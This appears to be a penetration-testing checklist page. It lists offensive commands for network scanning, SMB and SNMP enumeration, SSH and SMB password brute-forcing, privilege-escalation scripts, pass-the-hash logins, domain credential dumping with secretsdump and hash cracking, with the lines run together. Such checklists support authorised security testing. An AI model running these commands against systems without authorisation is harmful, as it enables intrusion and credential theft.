Infrastructure Pentest Checklist
A comprehensive checklist for internal and external infrastructure penetration testing. Covers network enumeration, service exploitation, privilege escalation, and lateral movement techniques for enterprise environments.
nmap -sS -sV -O -T4 -p- -oA tcp_full target.comnmap -sU --top-ports 200 -T4 -oA udp_top target.comrustscan -a target.com --ulimit 5000 -- -sV -sCnmap -sV -sC -p <ports> target.com -oA servicesdig AXFR @ns1.target.com target.comdnsrecon -d target.com -t axfrfierce --domain target.comonesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.0.0.0/24snmpwalk -v2c -c public 10.0.0.5crackmapexec smb 10.0.0.0/24 --sharessmbclient -L //10.0.0.5 -Nshowmount -e 10.0.0.5nmap --script vuln -p- target.comnuclei -u https://target.com -severity high,criticalnmap -p 445 --script smb-vuln-ms17-010 10.0.0.0/24nmap -p 1433,3389,445 --script vuln 10.0.0.0/24scanner output (Nessus/Nmap NSE) showing the CVE ID and affected host, plus a successful exploitation proof or vulnerability check confirmation.
hydra -L users.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ssh://10.0.0.5crackmapexec smb 10.0.0.0/24 -u users.txt -p passwords.txttestssl.sh https://target.com:443sslyze --regular target.comnmap -p 21,23,80,389,143,110 -sV 10.0.0.0/24screenshot of an interactive shell or session on the compromised host with command output (e.g. `whoami`, `hostname`, `id`).
linpeas.shwinpeas.exeBloodHound.pybefore/after `whoami` output demonstrating escalation from low-privilege user to root or SYSTEM, plus the technique used.
crackmapexec smb 10.0.0.0/24 -u Administrator -H <ntlm_hash>evil-winrm -i 10.0.0.5 -u user -H <ntlm_hash>secretsdump.py -just-dc DOMAIN/Administrator@10.0.0.5hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txtnmap -sS -Pn -p- --max-retries 1 <segmented_target>